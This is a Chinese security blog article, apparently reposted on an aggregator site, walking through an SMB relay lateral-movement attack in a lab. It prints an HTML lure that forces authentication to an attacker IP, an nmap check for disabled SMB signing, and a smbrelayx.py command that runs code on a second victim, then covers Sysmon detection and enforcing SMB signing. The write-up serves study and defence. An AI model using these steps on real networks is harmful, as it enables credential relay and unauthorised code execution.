Sec Hotspot 首页  排行榜  收藏本站  技术博客  RSS
统计信息
已收录文章数量:17822 篇
已收录公众号数量:91 个
本站文章为爬虫采集,如有侵权请告知
已收录微信公众号
阿里云先知 网安寻路人 网信中国 区块链大本营 白说区块链 区块链投资家 区块链官微 区块链铅笔Blockchain HACK学习呀 二道情报贩子 合天智汇 小白帽学习之路 小米安全中心 弥天安全实验室 SAINTSEC SecPulse安全脉搏 TideSec安全团队 360安全卫士 游侠安全网 计算机与网络安全 安全祖师爷 安全学习那些事 腾讯安全联合实验室 黑客技术与网络安全 安全圈 腾讯御见威胁情报中心 Python开发者 Python之禅 编程派 Python那些事 Python程序员 安全威胁情报 吾爱破解论坛 行长叠报 安在 i春秋 嘶吼专业版 E安全 MottoIN 网信防务 网安杂谈 数说安全 互联网安全内参 漏洞战争 安全分析与研究 邑安全 ChaMd5安全团队 天融信阿尔法实验室 安全牛 SecWiki 安全学术圈 信安之路 漏洞感知 浅黑科技 Secquan圈子社区 奇安信集团 奇安信 CERT 国舜股份 雷神众测 盘古实验室 美团安全应急响应中心 瓜子安全应急响应中心 顺丰安全应急响应中心 蚂蚁金服安全响应中心 携程安全应急响应中心 滴滴安全应急响应中心 字节跳动安全中心 百度安全应急响应中心 腾讯安全应急响应中心 网易安全应急响应中心 OPPO安全应急响应中心 京东安全应急响应中心 Bypass CNNVD安全动态 安恒应急响应中心 天融信每日安全简报 奇安信威胁情报中心 看雪学院 黑白之道 水滴安全实验室 安全客 木星安全实验室 云鼎实验室 绿盟科技安全预警 白帽汇 深信服千里目安全实验室 腾讯玄武实验室 长亭安全课堂 FreeBuf 绿盟科技 nmask
通过SMB进行横向移动
本文来自公众号:木星安全实验室   2021.01.13 10:05:11



本文在禁用SMB签名的情况下,研究滥用SMB协议的横向移动技术。


SMB签名是一种安全机制,对SMB数据包进行数字签名,加强其真实性和完整性 —— 客户端/服务器知道他们接收的传入SMB数据包属于受信任的来源,在传输过程中未被篡改,防止中间人攻击。


如果禁用SMB签名,则可以拦截/篡改数据包或把数据包中继到另一个系统,这正是本文要讲的内容。




01

环境



  • 10.0.0.5-运行Kali Linux和SMB中继工具的攻击者

  • 10.0.0.2-受害者1; 他们的凭据会中继给受害者2

  • 10.0.0.6-受害者2; 用受害者1的凭据在受害者2上运行代码


注意: 受害者1的凭据必须是受害者2上的本地管理员,或者是管理员/域管理员组的成员,这样攻击才会奏效。


以下是攻击进程:


10.0.0.2 - 验证至-> 10.0.0.5 -中继到-> 10.0.0.6 用受害者1(10.0.0.2)凭据执行代码





02

执行



检查端点上的SMB签名是否已禁用:


nmap -p 445 10.0.0.6 -sS --script smb-security-mode.nse



得知受害者2@10.0.0.6已禁用SMB签名且易受到SMB中继攻击后,我们创建一个简单的HTML文件,一旦打开该文件,受害者1就会被迫对攻击者的计算机进行身份验证:


<html>    <h1>holla good sir</h1>    <img src="file://10.0.0.5/download.jpg"></html>


注意: 还有其他强制身份验证的方法,可在以下链接中获取所需的技术。


https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication


同时,启用SMBRelayx工具,该工具会侦听传入的SMB身份验证请求,将其中继到受害者2@10.0.0.6,在目标主机上执行命令: ipconfig


smbrelayx.py -h 10.0.0.6 -c "ipconfig"


注意: smbrelayx可以和-e选项一起使用,攻击者执行其有效载荷文件,如meterpreter可执行文件。


以下动图是这个技术的应用过程 —— 左边 —— victim1@10.0.0.2 打开我们之前制作的恶意html,让它对攻击者系统进行身份验证(右侧)。一旦进行身份验证,它会中继到 victim2@10.0.0.6 ,执行ipconfig并执:



动图里出现的停止帧突出显示了代码确实是在10.0.0.6上执行:







03

观察和缓解



Smbrelayx.py在Microsoft-Windows-Sysmon / Operational中为防御者留下了足迹 —— 父映像是services.exe,命令行有详细的信息,但命令行参数容易伪造出来:



为了减少这种类型的攻击,最好就是设置Microsoft网络客户端策略,如果可以的话,执行GPO:始终对通信进行数字签名来启用:



通过上述更改,执行相同的攻击,我们会收到 Signature is REQUIRED 的错误消息,横向移动受阻:



之前执行的nmap扫描也显示 signing is required的信息:


nmap -p 445 10.0.0.6 -sS --script smb-security-mode






参考:


  • https://evilenigma.blog/2017/03/19/lateral-movement-with-smbrelayx-py/

  • https://docs.microsoft.com/zh-cn/archive/blogs/josebda/the-basics-of-smb-signing-covering-both-smb1-and-smb2

  • https://nmap.org/nsedoc/scripts/smb-security-mode.html






木星安全实验室(MxLab) ,由中国网安·广州三零卫士成立,汇聚国内多名安全专家和反间谍专家组建而成,深耕工控安全、IoT安全、红队评估、反间谍、数据保护、APT分析等高级安全领域,木星安全实验室坚持在反间谍和业务安全的领域进行探索和研究。